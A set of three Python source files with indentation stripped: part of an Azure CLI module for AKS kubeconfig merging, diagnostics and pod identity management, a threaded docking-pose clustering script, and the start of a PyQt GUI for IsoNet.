instance.addon_profiles = addon_profiles
# null out the SP and AAD profile because otherwise validation complains
instance.service_principal_profile = None
instance.aad_profile = None
return instance
def aks_get_versions(cmd, client, location): # pylint: disable=unused-argument
return client.list_orchestrators(location, resource_type='managedClusters')
def aks_get_os_options(cmd, client, location): # pylint: disable=unused-argument
return client.get_os_options(location, resource_type='managedClusters')
def _print_or_merge_credentials(path, kubeconfig, overwrite_existing, context_name):
"""Merge an unencrypted kubeconfig into the file at the specified path, or print it to
stdout if the path is "-".
"""
# Special case for printing to stdout
if path == "-":
print(kubeconfig)
return
# ensure that at least an empty ~/.kube/config exists
directory = os.path.dirname(path)
if directory and not os.path.exists(directory):
try:
os.makedirs(directory)
except OSError as ex:
if ex.errno != errno.EEXIST:
raise
if not os.path.exists(path):
with os.fdopen(os.open(path, os.O_CREAT | os.O_WRONLY, 0o600), 'wt'):
pass
# merge the new kubeconfig into the existing one
fd, temp_path = tempfile.mkstemp()
additional_file = os.fdopen(fd, 'w+t')
try:
additional_file.write(kubeconfig)
additional_file.flush()
merge_kubernetes_configurations(
path, temp_path, overwrite_existing, context_name)
except yaml.YAMLError as ex:
logger.warning(
'Failed to merge credentials to kube config file: %s', ex)
finally:
additional_file.close()
os.remove(temp_path)
def _handle_merge(existing, addition, key, replace):
if not addition[key]:
return
if existing[key] is None:
existing[key] = addition[key]
return
for i in addition[key]:
for j in existing[key]:
if i['name'] == j['name']:
if replace or i == j:
existing[key].remove(j)
else:
from knack.prompting import prompt_y_n
msg = 'A different object named {} already exists in your kubeconfig file.\nOverwrite?'
overwrite = False
try:
overwrite = prompt_y_n(msg.format(i['name']))
except NoTTYException:
pass
if overwrite:
existing[key].remove(j)
else:
msg = 'A different object named {} already exists in {} in your kubeconfig file.'
raise CLIError(msg.format(i['name'], key))
existing[key].append(i)
def load_kubernetes_configuration(filename):
try:
with open(filename) as stream:
return yaml.safe_load(stream)
except (IOError, OSError) as ex:
if getattr(ex, 'errno', 0) == errno.ENOENT:
raise CLIError('{} does not exist'.format(filename))
except (yaml.parser.ParserError, UnicodeDecodeError) as ex:
raise CLIError('Error parsing {} ({})'.format(filename, str(ex)))
def merge_kubernetes_configurations(existing_file, addition_file, replace, context_name=None):
existing = load_kubernetes_configuration(existing_file)
addition = load_kubernetes_configuration(addition_file)
if context_name is not None:
addition['contexts'][0]['name'] = context_name
addition['contexts'][0]['context']['cluster'] = context_name
addition['clusters'][0]['name'] = context_name
addition['current-context'] = context_name
# rename the admin context so it doesn't overwrite the user context
for ctx in addition.get('contexts', []):
try:
if ctx['context']['user'].startswith('clusterAdmin'):
admin_name = ctx['name'] + '-admin'
addition['current-context'] = ctx['name'] = admin_name
break
except (KeyError, TypeError):
continue
if addition is None:
raise CLIError(
'failed to load additional configuration from {}'.format(addition_file))
if existing is None:
existing = addition
else:
_handle_merge(existing, addition, 'clusters', replace)
_handle_merge(existing, addition, 'users', replace)
_handle_merge(existing, addition, 'contexts', replace)
existing['current-context'] = addition['current-context']
# check that ~/.kube/config is only read- and writable by its owner
if platform.system() != 'Windows':
existing_file_perms = "{:o}".format(
stat.S_IMODE(os.lstat(existing_file).st_mode))
if not existing_file_perms.endswith('600'):
logger.warning('%s has permissions "%s".\nIt should be readable and writable only by its owner.',
existing_file, existing_file_perms)
with open(existing_file, 'w+') as stream:
yaml.safe_dump(existing, stream, default_flow_style=False)
current_context = addition.get('current-context', 'UNKNOWN')
msg = 'Merged "{}" as current context in {}'.format(
current_context, existing_file)
print(msg)
def cloud_storage_account_service_factory(cli_ctx, kwargs):
from azure.cli.core.profiles import ResourceType, get_sdk
t_cloud_storage_account = get_sdk(
cli_ctx, ResourceType.DATA_STORAGE, 'common#CloudStorageAccount')
account_name = kwargs.pop('account_name', None)
account_key = kwargs.pop('account_key', None)
sas_token = kwargs.pop('sas_token', None)
kwargs.pop('connection_string', None)
return t_cloud_storage_account(account_name, account_key, sas_token)
def get_storage_account_from_diag_settings(cli_ctx, resource_group_name, name):
from azure.mgmt.monitor import MonitorManagementClient
diag_settings_client = get_mgmt_service_client(
cli_ctx, MonitorManagementClient).diagnostic_settings
subscription_id = get_subscription_id(cli_ctx)
aks_resource_id = '/subscriptions/{0}/resourceGroups/{1}/providers/Microsoft.ContainerService' \
'/managedClusters/{2}'.format(subscription_id,
resource_group_name, name)
diag_settings = diag_settings_client.list(aks_resource_id)
if diag_settings.value:
return diag_settings.value[0].storage_account_id
print("No diag settings specified")
return None
def display_diagnostics_report(temp_kubeconfig_path): # pylint: disable=too-many-statements
if not which('kubectl'):
raise CLIError('Can not find kubectl executable in PATH')
nodes = subprocess.check_output(
["kubectl", "--kubeconfig", temp_kubeconfig_path,
"get", "node", "--no-headers"],
universal_newlines=True)
logger.debug(nodes)
node_lines = nodes.splitlines()
ready_nodes = {}
for node_line in node_lines:
columns = node_line.split()
logger.debug(node_line)
if columns[1] != "Ready":
logger.warning(
"Node %s is not Ready. Current state is: %s.", columns[0], columns[1])
else:
ready_nodes[columns[0]] = False
logger.debug('There are %s ready nodes in the cluster',
str(len(ready_nodes)))
if not ready_nodes:
logger.warning(
'No nodes are ready in the current cluster. Diagnostics info might not be available.')
network_config_array = []
network_status_array = []
apds_created = False
max_retry = 10
for retry in range(0, max_retry):
if not apds_created:
apd = subprocess.check_output(
["kubectl", "--kubeconfig", temp_kubeconfig_path, "get",
"apd", "-n", "aks-periscope", "--no-headers"],
universal_newlines=True
)
apd_lines = apd.splitlines()
if apd_lines and 'No resources found' in apd_lines[0]:
apd_lines.pop(0)
print("Got {} diagnostic results for {} ready nodes{}\r".format(len(apd_lines),
len(ready_nodes),
'.' * retry), end='')
if len(apd_lines) < len(ready_nodes):
time.sleep(3)
else:
apds_created = True
print()
else:
for node_name in ready_nodes:
if ready_nodes[node_name]:
continue
apdName = "aks-periscope-diagnostic-" + node_name
try:
network_config = subprocess.check_output(
["kubectl", "--kubeconfig", temp_kubeconfig_path,
"get", "apd", apdName, "-n",
"aks-periscope", "-o=jsonpath={.spec.networkconfig}"],
universal_newlines=True)
logger.debug('Dns status for node %s is %s',
node_name, network_config)
network_status = subprocess.check_output(
["kubectl", "--kubeconfig", temp_kubeconfig_path,
"get", "apd", apdName, "-n",
"aks-periscope", "-o=jsonpath={.spec.networkoutbound}"],
universal_newlines=True)
logger.debug('Network status for node %s is %s',
node_name, network_status)
if not network_config or not network_status:
print("The diagnostics information for node {} is not ready yet. "
"Will try again in 10 seconds.".format(node_name))
time.sleep(10)
break
network_config_array += json.loads(
'[' + network_config + ']')
network_status_object = json.loads(network_status)
network_status_array += format_diag_status(
network_status_object)
ready_nodes[node_name] = True
except subprocess.CalledProcessError as err:
raise CLIError(err.output)
print()
if network_config_array:
print("Below are the network configuration for each node: ")
print()
print(tabulate(network_config_array, headers="keys", tablefmt='simple'))
print()
else:
logger.warning("Could not get network config. "
"Please run 'az aks kanalyze' command later to get the analysis results.")
if network_status_array:
print("Below are the network connectivity results for each node:")
print()
print(tabulate(network_status_array, headers="keys", tablefmt='simple'))
else:
logger.warning("Could not get networking status. "
"Please run 'az aks kanalyze' command later to get the analysis results.")
def format_diag_status(diag_status):
for diag in diag_status:
if diag["Status"]:
if "Error:" in diag["Status"]:
diag["Status"] = f'{colorama.Fore.RED}{diag["Status"]}{colorama.Style.RESET_ALL}'
else:
diag["Status"] = f'{colorama.Fore.GREEN}{diag["Status"]}{colorama.Style.RESET_ALL}'
return diag_status
def format_bright(msg):
return f'\033[1m{colorama.Style.BRIGHT}{msg}{colorama.Style.RESET_ALL}'
def format_hyperlink(the_link):
return f'\033[1m{colorama.Style.BRIGHT}{colorama.Fore.BLUE}{the_link}{colorama.Style.RESET_ALL}'
def get_aks_custom_headers(aks_custom_headers=None):
headers = {}
if aks_custom_headers is not None:
if aks_custom_headers != "":
for pair in aks_custom_headers.split(','):
parts = pair.split('=')
if len(parts) != 2:
raise CLIError('custom headers format is incorrect')
headers[parts[0]] = parts[1]
return headers
def _put_managed_cluster_ensuring_permission(
cmd, # pylint: disable=too-many-locals,too-many-statements,too-many-branches
client,
subscription_id,
resource_group_name,
name,
managed_cluster,
monitoring_addon_enabled,
ingress_appgw_addon_enabled,
virtual_node_addon_enabled,
need_grant_vnet_permission_to_cluster_identity,
vnet_subnet_id,
enable_managed_identity,
attach_acr,
headers,
no_wait
):
# some addons require post cluster creation role assigment
need_post_creation_role_assignment = (monitoring_addon_enabled or
ingress_appgw_addon_enabled or
(enable_managed_identity and attach_acr) or
virtual_node_addon_enabled or
need_grant_vnet_permission_to_cluster_identity)
if need_post_creation_role_assignment:
# adding a wait here since we rely on the result for role assignment
cluster = LongRunningOperation(cmd.cli_ctx)(client.create_or_update(
resource_group_name=resource_group_name,
resource_name=name,
parameters=managed_cluster,
custom_headers=headers))
cloud_name = cmd.cli_ctx.cloud.name
# add cluster spn/msi Monitoring Metrics Publisher role assignment to publish metrics to MDM
# mdm metrics is supported only in azure public cloud, so add the role assignment only in this cloud
if monitoring_addon_enabled and cloud_name.lower() == 'azurecloud':
from msrestazure.tools import resource_id
cluster_resource_id = resource_id(
subscription=subscription_id,
resource_group=resource_group_name,
namespace='Microsoft.ContainerService', type='managedClusters',
name=name
)
_add_monitoring_role_assignment(cluster, cluster_resource_id, cmd)
if ingress_appgw_addon_enabled:
_add_ingress_appgw_addon_role_assignment(cluster, cmd)
if virtual_node_addon_enabled:
_add_virtual_node_role_assignment(cmd, cluster, vnet_subnet_id)
if need_grant_vnet_permission_to_cluster_identity:
if not _create_role_assignment(cmd.cli_ctx, 'Network Contributor',
cluster.identity.principal_id, scope=vnet_subnet_id,
resolve_assignee=False):
logger.warning('Could not create a role assignment for subnet. '
'Are you an Owner on this subscription?')
if enable_managed_identity and attach_acr:
# Attach ACR to cluster enabled managed identity
if cluster.identity_profile is None or \
cluster.identity_profile["kubeletidentity"] is None:
logger.warning('Your cluster is successfully created, but we failed to attach '
'acr to it, you can manually grant permission to the identity '
'named <ClUSTER_NAME>-agentpool in MC_ resource group to give '
'it permission to pull from ACR.')
else:
kubelet_identity_client_id = cluster.identity_profile["kubeletidentity"].client_id
_ensure_aks_acr(cmd.cli_ctx,
client_id=kubelet_identity_client_id,
acr_name_or_id=attach_acr,
subscription_id=subscription_id)
else:
cluster = sdk_no_wait(no_wait, client.create_or_update,
resource_group_name=resource_group_name,
resource_name=name,
parameters=managed_cluster,
custom_headers=headers)
return cluster
def _is_msi_cluster(managed_cluster):
return (managed_cluster and managed_cluster.identity and
(managed_cluster.identity.type.casefold() == "systemassigned" or managed_cluster.identity.type.casefold() == "userassigned"))
def _get_kubelet_config(file_path):
kubelet_config = get_file_json(file_path)
if not isinstance(kubelet_config, dict):
raise CLIError(
"Error reading kubelet configuration at {}. Please see https://aka.ms/CustomNodeConfig for correct format.".format(file_path))
config_object = KubeletConfig()
config_object.cpu_manager_policy = kubelet_config.get(
"cpuManagerPolicy", None)
config_object.cpu_cfs_quota = kubelet_config.get("cpuCfsQuota", None)
config_object.cpu_cfs_quota_period = kubelet_config.get(
"cpuCfsQuotaPeriod", None)
config_object.image_gc_high_threshold = kubelet_config.get(
"imageGcHighThreshold", None)
config_object.image_gc_low_threshold = kubelet_config.get(
"imageGcLowThreshold", None)
config_object.topology_manager_policy = kubelet_config.get(
"topologyManagerPolicy", None)
config_object.allowed_unsafe_sysctls = kubelet_config.get(
"allowedUnsafeSysctls", None)
config_object.fail_swap_on = kubelet_config.get("failSwapOn", None)
return config_object
def _get_linux_os_config(file_path):
os_config = get_file_json(file_path)
if not isinstance(os_config, dict):
raise CLIError(
"Error reading Linux OS configuration at {}. Please see https://aka.ms/CustomNodeConfig for correct format.".format(file_path))
config_object = LinuxOSConfig()
config_object.transparent_huge_page_enabled = os_config.get(
"transparentHugePageEnabled", None)
config_object.transparent_huge_page_defrag = os_config.get(
"transparentHugePageDefrag", None)
config_object.swap_file_size_mb = os_config.get("swapFileSizeMB", None)
# sysctl settings
sysctls = os_config.get("sysctls", None)
if not isinstance(sysctls, dict):
raise CLIError(
"Error reading Sysctl settings at {}. Please see https://aka.ms/CustomNodeConfig for correct format.".format(file_path))
config_object.sysctls = SysctlConfig()
config_object.sysctls.net_core_somaxconn = sysctls.get(
"netCoreSomaxconn", None)
config_object.sysctls.net_core_netdev_max_backlog = sysctls.get(
"netCoreNetdevMaxBacklog", None)
config_object.sysctls.net_core_rmem_max = sysctls.get(
"netCoreRmemMax", None)
config_object.sysctls.net_core_wmem_max = sysctls.get(
"netCoreWmemMax", None)
config_object.sysctls.net_core_optmem_max = sysctls.get(
"netCoreOptmemMax", None)
config_object.sysctls.net_ipv4_tcp_max_syn_backlog = sysctls.get(
"netIpv4TcpMaxSynBacklog", None)
config_object.sysctls.net_ipv4_tcp_max_tw_buckets = sysctls.get(
"netIpv4TcpMaxTwBuckets", None)
config_object.sysctls.net_ipv4_tcp_fin_timeout = sysctls.get(
"netIpv4TcpFinTimeout", None)
config_object.sysctls.net_ipv4_tcp_keepalive_time = sysctls.get(
"netIpv4TcpKeepaliveTime", None)
config_object.sysctls.net_ipv4_tcp_keepalive_probes = sysctls.get(
"netIpv4TcpKeepaliveProbes", None)
config_object.sysctls.net_ipv4_tcpkeepalive_intvl = sysctls.get(
"netIpv4TcpkeepaliveIntvl", None)
config_object.sysctls.net_ipv4_tcp_rmem = sysctls.get(
"netIpv4TcpRmem", None)
config_object.sysctls.net_ipv4_tcp_wmem = sysctls.get(
"netIpv4TcpWmem", None)
config_object.sysctls.net_ipv4_tcp_tw_reuse = sysctls.get(
"netIpv4TcpTwReuse", None)
config_object.sysctls.net_ipv4_ip_local_port_range = sysctls.get(
"netIpv4IpLocalPortRange", None)
config_object.sysctls.net_ipv4_neigh_default_gc_thresh1 = sysctls.get(
"netIpv4NeighDefaultGcThresh1", None)
config_object.sysctls.net_ipv4_neigh_default_gc_thresh2 = sysctls.get(
"netIpv4NeighDefaultGcThresh2", None)
config_object.sysctls.net_ipv4_neigh_default_gc_thresh3 = sysctls.get(
"netIpv4NeighDefaultGcThresh3", None)
config_object.sysctls.net_netfilter_nf_conntrack_max = sysctls.get(
"netNetfilterNfConntrackMax", None)
config_object.sysctls.net_netfilter_nf_conntrack_buckets = sysctls.get(
"netNetfilterNfConntrackBuckets", None)
config_object.sysctls.fs_inotify_max_user_watches = sysctls.get(
"fsInotifyMaxUserWatches", None)
config_object.sysctls.fs_file_max = sysctls.get("fsFileMax", None)
config_object.sysctls.fs_aio_max_nr = sysctls.get("fsAioMaxNr", None)
config_object.sysctls.fs_nr_open = sysctls.get("fsNrOpen", None)
config_object.sysctls.kernel_threads_max = sysctls.get(
"kernelThreadsMax", None)
config_object.sysctls.vm_max_map_count = sysctls.get("vmMaxMapCount", None)
config_object.sysctls.vm_swappiness = sysctls.get("vmSwappiness", None)
config_object.sysctls.vm_vfs_cache_pressure = sysctls.get(
"vmVfsCachePressure", None)
return config_object
def _is_pod_identity_addon_enabled(instance):
if not instance:
return False
if not instance.pod_identity_profile:
return False
return bool(instance.pod_identity_profile.enabled)
def _ensure_pod_identity_addon_is_enabled(instance):
if not _is_pod_identity_addon_enabled(instance):
raise CLIError('The pod identity addon is not enabled for this managed cluster yet.\n'
'To enable, run "az aks update --enable-pod-identity')
def _ensure_pod_identity_kubenet_consent(network_profile, pod_identity_profile, customer_consent):
if not network_profile or not network_profile.network_plugin:
# invalid data
return
if network_profile.network_plugin.lower() != 'kubenet':
# not kubenet, no need to check
return
if customer_consent is None:
# no set this time, read from previous value
customer_consent = bool(
pod_identity_profile.allow_network_plugin_kubenet)
if not customer_consent:
raise CLIError(
'--enable-pod-identity-with-kubenet is required for enabling pod identity addon when using Kubenet network plugin')
pod_identity_profile.allow_network_plugin_kubenet = True
def _update_addon_pod_identity(instance, enable, pod_identities=None, pod_identity_exceptions=None, allow_kubenet_consent=None):
if not enable:
# when disable, remove previous saved value
instance.pod_identity_profile = ManagedClusterPodIdentityProfile(
enabled=False)
return
if not instance.pod_identity_profile:
# not set before
instance.pod_identity_profile = ManagedClusterPodIdentityProfile(
enabled=enable,
user_assigned_identities=pod_identities,
user_assigned_identity_exceptions=pod_identity_exceptions,
)
_ensure_pod_identity_kubenet_consent(
instance.network_profile, instance.pod_identity_profile, allow_kubenet_consent)
instance.pod_identity_profile.enabled = enable
instance.pod_identity_profile.user_assigned_identities = pod_identities or []
instance.pod_identity_profile.user_assigned_identity_exceptions = pod_identity_exceptions or []
def _ensure_managed_identity_operator_permission(cli_ctx, instance, scope):
cluster_identity_object_id = None
if instance.identity.type.lower() == 'userassigned':
for identity in instance.identity.user_assigned_identities.values():
cluster_identity_object_id = identity.principal_id
break
elif instance.identity.type.lower() == 'systemassigned':
cluster_identity_object_id = instance.identity.principal_id
else:
raise CLIError('unsupported identity type: {}'.format(
instance.identity.type))
if cluster_identity_object_id is None:
raise CLIError('unable to resolve cluster identity')
factory = get_auth_management_client(cli_ctx, scope)
assignments_client = factory.role_assignments
for i in assignments_client.list_for_scope(scope=scope, filter='atScope()'):
if i.scope.lower() != scope.lower():
continue
if not i.role_definition_id.lower().endswith(CONST_MANAGED_IDENTITY_OPERATOR_ROLE_ID):
continue
if i.principal_id.lower() != cluster_identity_object_id.lower():
continue
# already assigned
return
if not _add_role_assignment(cli_ctx, CONST_MANAGED_IDENTITY_OPERATOR_ROLE, cluster_identity_object_id,
is_service_principal=False, scope=scope):
raise CLIError(
'Could not grant Managed Identity Operator permission for cluster')
# need more time to propogate this assignment...
print()
print('Wait 30 seconds for identity role assignment propagation.')
time.sleep(30)
def aks_pod_identity_add(cmd, client, resource_group_name, cluster_name,
identity_name, identity_namespace, identity_resource_id,
binding_selector=None,
no_wait=False): # pylint: disable=unused-argument
instance = client.get(resource_group_name, cluster_name)
_ensure_pod_identity_addon_is_enabled(instance)
user_assigned_identity = _get_user_assigned_identity(
cmd.cli_ctx, identity_resource_id)
_ensure_managed_identity_operator_permission(
cmd.cli_ctx, instance, user_assigned_identity.id)
pod_identities = []
if instance.pod_identity_profile.user_assigned_identities:
pod_identities = instance.pod_identity_profile.user_assigned_identities
pod_identity = ManagedClusterPodIdentity(
name=identity_name,
namespace=identity_namespace,
identity=UserAssignedIdentity(
resource_id=user_assigned_identity.id,
client_id=user_assigned_identity.client_id,
object_id=user_assigned_identity.principal_id,
)
)
if binding_selector is not None:
pod_identity.binding_selector = binding_selector
pod_identities.append(pod_identity)
_update_addon_pod_identity(
instance, enable=True,
pod_identities=pod_identities,
pod_identity_exceptions=instance.pod_identity_profile.user_assigned_identity_exceptions,
)
# send the managed cluster represeentation to update the pod identity addon
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, cluster_name, instance)
def aks_pod_identity_delete(cmd, client, resource_group_name, cluster_name,
identity_name, identity_namespace,
no_wait=False): # pylint: disable=unused-argument
instance = client.get(resource_group_name, cluster_name)
_ensure_pod_identity_addon_is_enabled(instance)
pod_identities = []
if instance.pod_identity_profile.user_assigned_identities:
for pod_identity in instance.pod_identity_profile.user_assigned_identities:
if pod_identity.name == identity_name and pod_identity.namespace == identity_namespace:
# to remove
continue
pod_identities.append(pod_identity)
_update_addon_pod_identity(
instance, enable=True,
pod_identities=pod_identities,
pod_identity_exceptions=instance.pod_identity_profile.user_assigned_identity_exceptions,
)
# send the managed cluster represeentation to update the pod identity addon
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, cluster_name, instance)
def aks_pod_identity_list(cmd, client, resource_group_name, cluster_name): # pylint: disable=unused-argument
instance = client.get(resource_group_name, cluster_name)
return _remove_nulls([instance])[0]
def aks_pod_identity_exception_add(cmd, client, resource_group_name, cluster_name,
exc_name, exc_namespace, pod_labels, no_wait=False): # pylint: disable=unused-argument
instance = client.get(resource_group_name, cluster_name)
_ensure_pod_identity_addon_is_enabled(instance)
pod_identity_exceptions = []
if instance.pod_identity_profile.user_assigned_identity_exceptions:
pod_identity_exceptions = instance.pod_identity_profile.user_assigned_identity_exceptions
exc = ManagedClusterPodIdentityException(
name=exc_name, namespace=exc_namespace, pod_labels=pod_labels)
pod_identity_exceptions.append(exc)
_update_addon_pod_identity(
instance, enable=True,
pod_identities=instance.pod_identity_profile.user_assigned_identities,
pod_identity_exceptions=pod_identity_exceptions,
)
# send the managed cluster represeentation to update the pod identity addon
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, cluster_name, instance)
def aks_pod_identity_exception_delete(cmd, client, resource_group_name, cluster_name,
exc_name, exc_namespace, no_wait=False): # pylint: disable=unused-argument
instance = client.get(resource_group_name, cluster_name)
_ensure_pod_identity_addon_is_enabled(instance)
pod_identity_exceptions = []
if instance.pod_identity_profile.user_assigned_identity_exceptions:
for exc in instance.pod_identity_profile.user_assigned_identity_exceptions:
if exc.name == exc_name and exc.namespace == exc_namespace:
# to remove
continue
pod_identity_exceptions.append(exc)
_update_addon_pod_identity(
instance, enable=True,
pod_identities=instance.pod_identity_profile.user_assigned_identities,
pod_identity_exceptions=pod_identity_exceptions,
)
# send the managed cluster represeentation to update the pod identity addon
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, cluster_name, instance)
def aks_pod_identity_exception_update(cmd, client, resource_group_name, cluster_name,
exc_name, exc_namespace, pod_labels, no_wait=False): # pylint: disable=unused-argument
instance = client.get(resource_group_name, cluster_name)
_ensure_pod_identity_addon_is_enabled(instance)
found_target = False
updated_exc = ManagedClusterPodIdentityException(
name=exc_name, namespace=exc_namespace, pod_labels=pod_labels)
pod_identity_exceptions = []
if instance.pod_identity_profile.user_assigned_identity_exceptions:
for exc in instance.pod_identity_profile.user_assigned_identity_exceptions:
if exc.name == exc_name and exc.namespace == exc_namespace:
found_target = True
pod_identity_exceptions.append(updated_exc)
else:
pod_identity_exceptions.append(exc)
if not found_target:
raise CLIError(
'pod identity exception {}/{} not found'.format(exc_namespace, exc_name))
_update_addon_pod_identity(
instance, enable=True,
pod_identities=instance.pod_identity_profile.user_assigned_identities,
pod_identity_exceptions=pod_identity_exceptions,
)
# send the managed cluster represeentation to update the pod identity addon
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, cluster_name, instance)
def aks_pod_identity_exception_list(cmd, client, resource_group_name, cluster_name):
instance = client.get(resource_group_name, cluster_name)
return _remove_nulls([instance])[0]
def _ensure_cluster_identity_permission_on_kubelet_identity(cli_ctx, cluster_identity_object_id, scope):
factory = get_auth_management_client(cli_ctx, scope)
assignments_client = factory.role_assignments
for i in assignments_client.list_for_scope(scope=scope, filter='atScope()'):
if i.scope.lower() != scope.lower():
continue
if not i.role_definition_id.lower().endswith(CONST_MANAGED_IDENTITY_OPERATOR_ROLE_ID):
continue
if i.principal_id.lower() != cluster_identity_object_id.lower():
continue
# already assigned
return
if not _add_role_assignment(cli_ctx, CONST_MANAGED_IDENTITY_OPERATOR_ROLE, cluster_identity_object_id,
is_service_principal=False, scope=scope):
raise CLIError('Could not grant Managed Identity Operator permission to cluster identity at scope {}'.format(scope))
|
Clustered.py
|
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
import bisect
from threading import Thread, Lock
from collections import OrderedDict
from .Tools import *
from .debug import Debug
from .debug import BColors
import json
if sys.version_info[0] == 3:
from queue import Queue, Empty
else:
from Queue import Queue, Empty
TAG = "Clustered.py: "
color = BColors.GREEN
class Clustered(object):
def __init__(self, cfg):
if cfg.opcion.startswith("BD") and cfg.clustered:
self.clt_path = cfg.OUTPUT_GRAPHS['clusters'][
'outPut'] + ".txt"
self.clt_json_path = cfg.OUTPUT_GRAPHS['clusters'][
'outPut'] + ".json"
self.cfg = cfg
self.debug = Debug(cfg.mode_debug)
self.queue = Queue()
self.mutex = Lock()
self.create_clustered()
@staticmethod
def add_to_cluster(q, mutex, pbar, poses):
while True:
try:
task = q.get(timeout=0.3)
except Empty:
continue
if task is None:
q.task_done()
break
else:
cluster, pose = task
if cluster[0].check_overlap(pose):
mutex.acquire()
poses.remove(pose)
bisect.insort(task[0], pose)
mutex.release()
q.task_done()
@staticmethod
def read_pose_file(q, mutex, pbar, poses):
while True:
try:
lig_pose = q.get(timeout=0.3)
except Empty:
continue
if lig_pose is None:
q.task_done()
break
else:
mutex.acquire()
bisect.insort(poses, lig_pose)
mutex.release()
q.task_done()
#
# Create a pml file with the protein data the best ligands for pymol
#
def create_clustered(self):
pbar = custom_pbar()
try:
poses = []
threads = []
for i in range(self.cfg.cores):
thread = Thread(target=self.read_pose_file, args=(self.queue, self.mutex, pbar, poses))
thread.setDaemon(True)
thread.start()
threads.append(thread)
print(' Leyendo poses...')
pbar.start()
for lig in self.cfg.best_poses:
self.queue.put(lig)
self.queue.join()
pbar.finish()
print(' ')
except KeyboardInterrupt:
sys.stderr.write('\n\n\nCtrl+C: interrumpiendo\n\n\n')
self.queue.queue.clear()
for i in range(self.cfg.cores):
self.queue.put(None)
sys.exit()
else:
for i in range(self.cfg.cores):
self.queue.put(None)
for th in threads:
th.join()
clusters = self.make_clustered(poses)
self.cfg.best_poses = [cl[0] for cl in clusters.values()]
def clusterizar_poses(self, poses):
poses = list(poses)
clusters = []
pbar = custom_pbar()
try:
threads = []
for i in range(self.cfg.cores):
thread = Thread(target=self.add_to_cluster, args=(self.queue, self.mutex, pbar, poses))
thread.setDaemon(True)
thread.start()
threads.append(thread)
print(' Haciendo clusterizado...')
pbar.start()
while len(poses):
# The poses are ordered by energy, so the first pose in the list is the best one
# that does not yet belong to any cluster, so we use it as the center of a new one.
new_cluster = [poses.pop(0)]
for pose in list(poses):
self.queue.put((new_cluster, pose))
self.queue.join()
clusters.append(new_cluster)
pbar.finish()
print(' ')
except KeyboardInterrupt:
sys.stderr.write('\n\n\nCtrl+C: interrumpiendo\n\n\n')
self.queue.queue.clear()
for i in range(self.cfg.cores):
self.queue.put(None)
sys.exit()
else:
for i in range(self.cfg.cores):
self.queue.put(None)
for th in threads:
th.join()
return clusters
def make_clustered(self, poses):
fclt = open(self.clt_path, "wt")
clusters = OrderedDict()
cls = {}
for i, cluster in enumerate(self.clusterizar_poses(poses)):
best_pose = cluster[0]
cl_name = "Site_{}_E{:.1f}".format(i + 1, best_pose.get_score())
clusters[cl_name] = cluster
fclt.write('Cluster #{} ( {:.1f} kcal/mol): {} poses; best pose: {}; site: ({:.2f}, {:.2f}, {:.2f})\n'
.format(i + 1, best_pose.get_score(), len(cluster), best_pose.num_execution, *best_pose.coords))
c ={
'cluster':i+1,
'score':best_pose.get_score(),
'size': len(cluster),
'best_pose': best_pose.num_execution,
'coords':best_pose.coords,
'option':self.cfg.opcion
}
cls['cl_'+str(i+1)]=c;
best_pose.copy_files(self.cfg.OUTPUT_DIRS['bestScore'])
fclt.close()
with open(self.clt_json_path, 'w') as json_file:
json.dump(cls, json_file)
self.fusion_graficas_en_cl(clusters)
return clusters
def fusion_graficas_en_cl(self, clusters):
clusters = [cl[0].get_score() for cl in clusters.values() for _ in cl]
title = "Clustered Docking Results ({} on {}):\n Binding Energy Frequency"\
.format(self.cfg.name_query, self.cfg.name_target)
fname = os.path.join(self.cfg.file_input, self.cfg.name_input + "_Clustered")
self.cfg.graphicsGenerator.generate_histogram_2(
clusters, self.cfg.plot_data, 'Clusters', 'Unclustered poses', title,
'Binding energy (kcal/mol)', 'Frequency', 'symlog', fname)
|
Isonet_app.py
|
from PyQt5 import QtCore, QtGui, QtWidgets
from PyQt5.QtCore import QObject, pyqtSlot
from IsoNet.gui.mainwindow_v3 import Ui_MainWindow
import sys
import os
from IsoNet.gui.model import Model
import time
from threading import Thread
class MainWindowUIClass( Ui_MainWindow ):
def __init__( self ):
'''Initialize the super class
'''
super().__init__()
self.model = Model()
def setupUi( self, MW ):
''' Setup the UI of the super class, and add here code
that relates to the way we want our UI to operate.
'''
super().setupUi( MW )
self.logWindow.setFontPointSize(12)
self.model.processing = False
if self.model.isValid("log.txt"):
#qcolor = QtGui.QColor("red")
#self.logWindow.setTextColor(qcolor)
self.logWindow.setText( self.model.getFileContents("log.txt") )
# close the lower part of the splitter to hide the
# debug window under normal operations
#self.splitter.setSizes([300, 0])
isonet_path = os.popen("which isonet.py").read()
tmp = isonet_path.split("bin/isonet.py")
root_path = tmp[0]
icon = QtGui.QIcon()
icon.addPixmap(QtGui.QPixmap(root_path+"gui/icons/icon_folder.png"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
self.button_tomo_dir.setIcon(icon)
self.button_mask_dir.setIcon(icon)
self.button_pretrain_model.setIcon(icon)
self.button_output.setIcon(icon)
self.button_refined_model.setIcon(icon)
icon1 = QtGui.QIcon()
icon1.addPixmap(QtGui.QPixmap(root_path+"gui/icons/icon_advanced.png"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
self.button_advance_mask.setIcon(icon1)
self.button_advance_refine.setIcon(icon1)
self.button_advance_predict.setIcon(icon1)
def refreshAll( self ):
'''
Updates the widgets whenever an interaction happens.
Typically some interaction takes place, the UI responds,
and informs the model of the change. Then this method
is called, pulling from the model information that is
updated in the GUI.
'''
self.lineEdit_mask_dir.setText( self.model.getFolderName() )
print(QtGui.QTextCursor.END)
self.logWindow.setText( self.model.getFileContents("log.txt") )
#self.lineEdit.setText( self.model.getFileName() )
#self.textEdit.setText( self.model.getFileContents() )
# slot
def browseSlot( self , btn ):
''' Called when the user presses the Browse button
'''
lineEdit = self.switch_btn(btn)
options = QtWidgets.QFileDialog.Options()
options |= QtWidgets.QFileDialog.DontUseNativeDialog
fileName, _ = QtWidgets.QFileDialog.getOpenFileName(
None,
"Choose File",
"",
"All Files (*)",
options=options)
if fileName:
#self.model.setFileName( fileName )
#######
#cmd = "echo choose file: {} >> log.txt ".format(fileName)
#os.system(cmd)
#self.logWindow.append("choose file: {}".format(fileName) )
lineEdit.setText( fileName )
#self.logWindow.moveCursor(QtGui.QTextCursor.End)
#######
#self.refreshAll()
